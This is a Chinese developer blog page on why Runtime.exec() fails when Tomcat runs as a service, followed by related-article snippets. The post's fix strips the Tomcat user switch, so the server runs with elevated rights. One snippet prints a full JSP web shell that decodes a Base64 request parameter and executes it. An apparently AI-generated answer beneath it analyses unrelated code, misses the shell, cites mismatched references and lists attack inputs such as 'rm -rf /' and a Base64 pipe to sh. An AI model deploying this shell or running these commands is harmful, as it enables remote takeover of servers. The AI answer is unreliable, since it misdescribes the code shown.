tomcat 服务下 runtime.exec(cmd) 无效的问题

最新推荐文章于 2023-07-14 09:56:58 发布
最新推荐文章于 2023-07-14 09:56:58 发布 · 1.5k 阅读 · 2
文章标签:

#tomcat #exec #runtime权限

    在的web应用程序中需要使用 runtime 来执行exec 来运行一个流量接收程序,我在window下使用eclipse 集成tomcat调试,没有一点问题,exec能够运行外部的cmd。把程序部署到 linux 的tomcat服务下,exec不能执行cmd,不报错。

     经过上万查资料发现,是用户权限的问题,使用eclipse +tomcat开发,程序是以登录者的权限运行,通常就是admin了。当把tomcat注册成服务,并部署web的时候就会出现问题了。因为tomcat运行时默认使用自己的用户,所以造成了exec程序无法执行的情况,解决的思路就是让tomcat不使用自己的用户运行。

 

      window下怎么修改还没找到!

     linux下修改如下:centos ,tomcat5.

     vim /etc/init.d/tomcat5 

 

     212行 $SU - $TOMCAT_USER -c "$TOMCAT_SCRIPT start" >> $TOMCAT_LOG 2>&1替换成

$SU -  -c "$TOMCAT_SCRIPT start" >> $TOMCAT_LOG 2>&1 就ok了。

 

服务启动tomcat执行Runtime.getRuntime().exec() 卡死
fly_zxy的专栏
04-08 6128
问题描述 项目里要实现一个功能:用java代码 Runtime.getRuntime().exec("C:\smryglclient\smryglhostmsg.exe gensn")执行cmd命令,并接受返回结果。一开始在我本机STS里运行时没有问题的,其它同事的机器也是正常运行。把整个web项目做成一个exe可执行程序。在测试机器上安装后执行到这段代码是卡住没有反应。具体是卡到读取执行c
java runtime exec卡住_java runtime.exec()命令不能执行
weixin_33635110的博客
02-16 1343
展开全部1Runtime.getRuntime()返回Process对象2Process对象拥有输入流和输出流3Process对象具有waitFor效应,命e69da5e6ba903231313335323631343130323136353331333332633066令有可能执行不成功!4先写入输入流,然后从Process里面读出输出命令即可。5以下是比较成功的方法,doc...
服务启动tomcat执行Runtime.getRuntime().exec()或某些别的交互方法无法执行
qq_42188112的博客
08-18 530
window系统禁止服务与桌面程序交互,目前所研究出的一种解决方式是一以脚本方式隐藏方式启动tomcat。 新建文件tomcat.bat用于启动tomcat: cmd /k “cd D:\tomcat\bin&&catalina run” 新建stup.vbs DIM objShell set objShell=wscript.createObject(“wscript.shell”) iReturn =objShell.Run(cmd.exe /tomcat.bat存放的路径”,0,TR
window环境下服务启动tomcat执行Runtime.getRuntime().exec()无效
weixin_40678019的博客
01-27 1296
在这里插入图片描述 在的web应用程序中需要使用 runtime执行exec 来运行一个流量接收程序,我在window下使用eclipse 集成tomcat调试,没有一点问题exec能够运行外部的cmd。把程序部署到 linux 的tomcat服务下,exec不能执行cmd,不报错。 经过上万查资料发现,是用户权限问题,使用eclipse +tomcat开发,程序是以登录者的权限运行,通常就是admin了。当把tomcat注册成服务,并部署web的时候就会出现问题了。因为tomcat运行时默认使用自
绿色版Tomcat启动时,双击startup.bat闪退或者使用cmd命令执行startup.bat报错
冰山上的来客的博客
07-11 1178
        使用绿色版Tomcat8,前提是JDK已配置好。一、报错现象:        1、双击startup.bat闪退;        2、使用cmd命令执行startup.bat报错如下:The tomcat8.exe was not found... The CATALINA_HOME environment variable is not defined correctly. Th...
Runtime.exec详解及执行bat脚本启动tomcat
永字诀的博客
07-17 1475
目录 1. Runtime简介 2. exec的系列方法 3. 启动外部tomcat 1. Runtime简介 每个Java应用程序都有一个Runtime类的Runtime ,允许应用程序与运行应用程序的环境进行接口。 当前运行时可以从getRuntime方法获得。应用程序无法创建自己的此类的实例。 两点说明: 无法自己创建Runtime对象,只能通过 Runtime getRuntime() 获取当前程序关联的运行时对象; 发布在同一个tomcat下的多个应用共享同一个 Runtime
使用Runtime.getRuntime().exec()的方法调用本地mysqldump.exe备份还原数据库(路径中含有空格和数字)的方法
Cooler的专栏
07-20 8585
这个问题花费我两天时间,上网搜中文的资料大都换另一种方式解决的。说是在java中cmd不支持重定向,采用的另一种方式是得到Runtime.getRuntime().exec()的输入流,然后写到一个文本中。这个方法也不错(本人没有使用)。 今天要介绍的方法是调用本地的mysqldump.exe重定向的方式备份数据库。首先要说明的是mysqldump.exe在哪里不重要,重要的是要处理好路
解决Java调用BAT批处理不弹出cmd窗口的方法分析
09-05
Runtime.getRuntime().exec("cmd.exe /C start D:\\test.bat"); ``` 这段代码会打开一个新的CMD窗口并执行指定的批处理文件。这里的"start"命令用于启动一个新的进程,"/C"参数表示执行cmd命令后关闭CMD窗口,而"D...
Java安全之反序列化回显与内存码,java核心编程视频教学
m0_64384302的博客
12-12 297
org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(connector[0].getProtocolHandler(), null)); Field processors = Class.forName(“org.apache.coyote.RequestGroupInfo”).getDeclared
Runtime.getRuntime()启动tomcat
weixin_34259159的博客
05-13 184
2019独角兽企业重金招聘Python工程师标准>>> ...
tomcat安装版运行CMD
iteye_11154的博客
05-02 319
tomcat如果是安装版或者服务的时候。 采用 Runtime.getRuntime().exec();运行cmd或者其他桌面程序可能会没有报错。 必须把Allow service to interact with desktop 勾上如下图 windows才允许tomcat打开程序 或者从服务里面设置   ...
非管理员权限cmd输入java有效,输入javac无效解决方案
热门推荐
永远的二爷
10-04 1万+
javac不是内部命令错误
tomcatexec引起的权限问题
学无止境
10-27 1万+
tomcatexec引起的权限问题 一、场景描述 在之前的工作中与某第三方集成(接入他们的某个功能),需要获取服务器Mac地址鉴权;在开发过程中一点问题没有(开发环境是windows),测试环境也测试通过(测试环境是linux,但tomcat用的root启动),但部署到准生产环境后(准生产环境使用的是普通用户启动tomcat),签章的过程中抛出Exception,提示未授权,并且
java执行cmd执行不成功
giscong的博客
07-16 1847
java中的exec执行问题 Runtime runTime = Runtime.getRuntime(); process = runTime.exec(cmd); 这个cmd如果直接写命令行里的操作肯定会报错,需要怎么处理呢 String [] cmd={"/bin/sh","-c",command}; 这样写就可以
解决java使用Runtime.exec执行linux命令不成功问题
wb785074651的博客
03-11 8729
近日实现一个需求,需要用java执行Linux命令,但是命令在Linux上面可以执行,但是java用 Runtime.getRuntime().exec(cmd)执行却不成功.比如关闭redis进程命令 ps -a | grep redis | xargs kill -9 用java执行却不行: String cmd = "ps -a | grep r......
内置在maven项目的服务器,IDEA使用maven中tomcat插件来启动服务器配置
weixin_34194482的博客
08-10 1228
一 、在项目pom文件中配置tomcat先添加如下配置:org.apache.maven.pluginsmaven-compiler-plugin2.3.21.71.7org.apache.tomcat.maventomcat7-maven-plugin8000/erp二、如图,点击Edit ConfigurationsTomcat7使用tomcat7,tomcat8以后将7和8兼容了,统一使用t...
Windows下Java调用BAT批处理不弹出cmd窗口
weixin_34417814的博客
10-30 389
常规Windows下Java调用BAT方式肯定会弹出cmd窗口 Runtime.getRuntime().exec("cmd.exe /C start D:\\test.bat"); 解决不弹框只需要“start”后面加一个参数“/b”就行: Runtime.getRuntime().exec("cmd.exe /C start ...
exec.Cmd 中 Start() 和 Run() 的区别
qq_21047625的博客
07-14 1418
方法适用于需要顺序执行外部命令,并且需要等待它们执行完成后再继续的情况。它会阻塞当前 Goroutine,直到命令执行完成,因此适合用于需要等待结果的场景。方法启动一个外部命令,并等待命令完成后再返回。方法适用于需要并发执行多个命令的情况,因为它允许你同时启动多个命令并在后台处理它们的输出。方法会阻塞当前 Goroutine,直到命令执行完成并返回结果。方法启动一个外部命令,但不等待命令完成就返回。你可以使用这个对象来等待命令完成、获取命令的输出等。,如果命令执行过程中出现错误,则返回该错误。
解决Runtime.exec() 无法读取命令输出
dns007
08-04 7623
关键:输出分2中标准输出和错误输出,获取正确的输出流才能去掉想要的结果 原文:http://berdy.iteye.com/blog/810223 Runtime 封装着java程序的运行时环境。通过Runtime实例,java应用能够与其运行的环境连接。Runtime在jvm中保持一个单例,所以不能通过Runtime类的构造函数。只能通过Runtime.getRuntime()来获的
请解释下段代码:<%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% try { String cmd = request.getParameter("tom"); String path=application.getRealPath(request.getRequestURI()); String dir=new File(path).getParent(); if(cmd.equals("Szh0ZWFt")){out.print("[S]"+dir+"[E]");} byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd); String k8cmd = new String(binary); Process child = Runtime.getRuntime().exec(k8cmd); InputStream in = child.getInputStream(); out.print("->|"); int c; while ((c = in.read()) != -1) { out.print((char)c); } in.close(); out.print("|<-"); try { child.waitFor(); } catch (InterruptedException e) { e.printStackTrace(); } } catch (IOException e) { System.err.println(e); } %
最新发布
07-25
<think>我们被要求分析一段JSP代码的功能和安全风险。代码片段中使用了BASE64Decoder,接收参数执行命令,获取路径等操作。根据提供的引用信息,我们可以参考一些相关的知识点。 首先,我们来看代码片段(从引用[3]中提取): ```java package com.servlet01.util; import sun.misc.BASE64Decoder; import sun.misc.BASE64Encoder; import java.io.UnsupportedEncodingException; import java.net.URLEncoder; public class DownLoadUtil { public static String getFileName(String agent, String filename) throws UnsupportedEncodingException { if (agent.contains("MSIE")) { // IE浏览器 filename = URLEncoder.encode(filename, "utf-8"); filename = filename.replace("+", " "); } else if (agent.contains("Firefox")) { // 火狐浏览器 BASE64Encoder base64Encoder = new BASE64Encoder(); filename = "=?utf-8?B" + base64Encoder.encode(filename.getBytes("utf-8")) + "?="; } else { // 其他浏览器 filename = URLEncoder.encode(filename, "utf-8"); } return filename; } } ``` 但是,用户的问题描述中提到了“接收参数执行命令、获取路径等操作”,而上面的代码并没有这些操作。因此,我们可能需要用户提供具体的JSP代码。由于用户没有提供完整的代码,我们只能根据问题描述进行一般性分析。 ### 功能分析 1. **BASE64编解码**:代码中使用了`BASE64Encoder`和`BASE64Decoder`(虽然示例中只用了Encoder,但用户提到Decoder,可能在别处使用)。Base64用于将二进制数据编码成可打印字符,常用于在HTTP等文本协议中传输二进制数据。 2. **接收参数执行命令**:如果代码中有接收参数(如通过`request.getParameter`获取参数)并执行系统命令(如使用`Runtime.exec()`),则可能是一个命令执行功能。 3. **获取路径**:可能涉及获取文件路径,如通过`request.getRealPath()`等方法获取服务器上的路径。 ### 安全风险分析 1. **使用非标准API**:`sun.misc.BASE64Encoder`和`sun.misc.BASE64Decoder`是Sun/Oracle JDK的内部API,不建议使用,因为它们在未来的版本中可能被移除或不可用。应使用`java.util.Base64`(Java 8及以上)代替。 2. **命令注入**:如果代码接收用户输入的参数并直接拼接成系统命令执行,则存在命令注入风险。攻击者可以通过构造恶意参数执行任意命令。例如: ```java String cmd = request.getParameter("cmd"); Runtime.getRuntime().exec(cmd); // 危险!可能执行任意命令 ``` 防范措施:避免直接执行用户输入的字符串,如果必须执行,应对输入进行严格过滤或使用白名单机制。 3. **路径遍历(Path Traversal)**:如果代码根据用户输入的参数构造文件路径,而没有进行安全校验,可能导致路径遍历攻击。攻击者可以通过`../`等跳转目录访问系统任意文件。例如: ```java String fileName = request.getParameter("file"); File file = new File("/base/dir/" + fileName); // 如果fileName为"../../etc/passwd",则可能访问敏感文件 ``` 防范措施:对用户输入的文件名进行规范化,并检查是否在允许的目录内。 4. **敏感信息泄露**:如果代码将服务器上的文件内容返回给用户,且没有进行权限控制,可能导致敏感信息泄露。 5. **XSS(跨站脚本攻击)**:如果代码将用户输入的数据直接输出到HTML页面,而没有进行转义,则可能引发XSS攻击。不过JSP中可以使用JSTL的`<c:out>`或EL表达式`${}`(默认转义)来避免。 6. **其他风险**:如使用不安全的HTTP协议传输敏感Cookie(引用[2]中提到),但本段代码未涉及。 ### 总结 由于用户没有提供完整的代码,我们只能根据常见情况分析。如果代码中存在以下情况: - 使用用户输入直接执行系统命令(命令注入) - 使用用户输入构造文件路径(路径遍历) - 使用内部不稳定的API(如`sun.misc`包) - 未对用户输入进行过滤或转义 则存在较高的安全风险。 ### 建议 1. 避免使用`sun.misc`包中的Base64编解码类,改用`java.util.Base64`。 2. 不要直接执行用户输入的命令,如果必须,请使用白名单机制或严格过滤。 3. 处理文件路径时,使用`getCanonicalPath`方法解析路径,并检查是否在允许的目录内。 4. 对用户输入进行适当的过滤和编码,防止XSS和路径遍历。 5. 对于敏感操作,增加权限验证。 ### 相关问题 1. 如何安全地在Java中执行系统命令? 2. 如何防止路径遍历攻击? 3. 在Java Web应用中,有哪些安全编码的最佳实践? 4. 为什么应避免使用`sun.misc`中的类?有哪些替代方案?</think>### 功能分析 以下JSP代码的功能分析(基于引用[3]的`DownLoadUtil`类): 1. **浏览器适配文件下载名** - 接收HTTP请求头中的`User-Agent`和文件名参数。 - **IE浏览器**:使用`URLEncoder`对文件名进行UTF-8编码,并替换空格占位符`+`为实际空格。 - **Firefox浏览器**:使用Base64编码文件名,格式化为MIME头格式`=?utf-8?B?...?=`。 - **其他浏览器**:统一使用`URLEncoder`进行URL编码。 - **目的**:解决不同浏览器下载中文文件名时的乱码问题。 2. **Base64编解码** - 使用`sun.misc.BASE64Encoder`对文件名编码(仅用于Firefox)。 - **潜在操作**:若代码中存在`BASE64Decoder`,可能用于解码用户传入的Base64参数(如解码隐藏参数)。 --- ### 安全风险分析 结合引用[2][3]的安全规范和代码行为: 1. **命令注入风险** - **风险点**:若代码中存在`Runtime.exec()`或`ProcessBuilder`执行用户传入参数(如`request.getParameter("cmd")`)。 - **后果**:攻击者可构造恶意参数执行系统命令,例如: ```http http://example.com/page.jsp?cmd=rm+-rf+/ ``` - **加固建议**: - 禁止直接执行用户输入,使用白名单过滤参数。 - 用`java.lang.Process`的`参数数组`替代字符串拼接(如`exec(new String[]{"ls", "-l"})`)。 2. **路径遍历攻击(Path Traversal)** - **风险点**:若通过`request.getParameter("path")`获取路径并操作文件(如读取/写入)。 - **攻击示例**: ```http http://example.com/page.jsp?path=../../etc/passwd ``` - **加固建议**: - 使用`getCanonicalPath()`规范化路径,检查是否在允许的目录内。 - 过滤`../`等特殊字符。 3. **Base64解码风险** - **风险点**:`BASE64Decoder`解码用户可控数据可能隐藏恶意Payload。 - **案例**:攻击者传递Base64编码的命令`echo${IFS}Y3VybA==|base64${IFS}-d|sh`绕过简单过滤。 - **加固建议**: - 避免解码后直接使用,需二次验证内容。 4. **敏感信息泄露** - **风险点**:未设置`secure`属性的Cookie在HTTP明文传输(引用[2])。 - **加固建议**: ```java Cookie cookie = new Cookie("token", "value"); cookie.setSecure(true); // 仅HTTPS传输 cookie.setHttpOnly(true); // 禁止JavaScript访问 ``` 5. **不安全的API使用** - **风险点**: - `sun.misc.*`是内部API,不同JDK版本可能不可用(应改用`java.util.Base64`)。 - 直接拼接用户输入到命令/路径中。 --- ### 安全加固示例代码 ```java // 使用标准Base64 API(替代sun.misc.*) import java.util.Base64; // 安全获取参数并过滤 public static String safeGetParam(HttpServletRequest request, String paramName) { String value = request.getParameter(paramName); // 过滤特殊字符(根据场景扩展) return value.replaceAll("[;|&$<>]", ""); } // 安全执行命令(白名单机制) public static void safeExec(String command) throws Exception { String[] allowedCommands = {"ls", "date"}; List<String> cmdList = Arrays.asList(allowedCommands); String[] parts = command.split("\\s+"); if (cmdList.contains(parts[0])) { Process p = Runtime.getRuntime().exec(parts); } else { throw new SecurityException("Command not allowed"); } } ``` --- ### 总结建议 1. **输入验证**:所有用户输入需强制过滤(如删除`;|$()`等危险字符)。 2. **避免直接执行命令**:优先使用Java原生API替代系统命令。 3. **升级API**:将`sun.misc.Base64`替换为`java.util.Base64`。 4. **最小权限**:运行Tomcat的用户应限制文件系统权限。 5. **安全传输**:敏感Cookie启用`secure`和`httpOnly`属性(引用[2])。 > 提示:实际风险需结合完整代码分析,以上基于典型漏洞场景推导。 --- ### 相关问题 1. JSP中如何安全地处理用户上传的文件路径? 2. 如何防止JSP页面中的命令注入攻击? 3. Java Web应用中如何正确设置Cookie的安全属性? 4. 为什么要避免使用`sun.misc`包中的类?有哪些替代方案? 5. Base64编码在Web安全中有哪些常见的误用场景? [^1]: 引用自Servlet基础示例 [^2]: 引用自Cookie安全属性说明 [^3]: 引用自文件下载工具类实现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值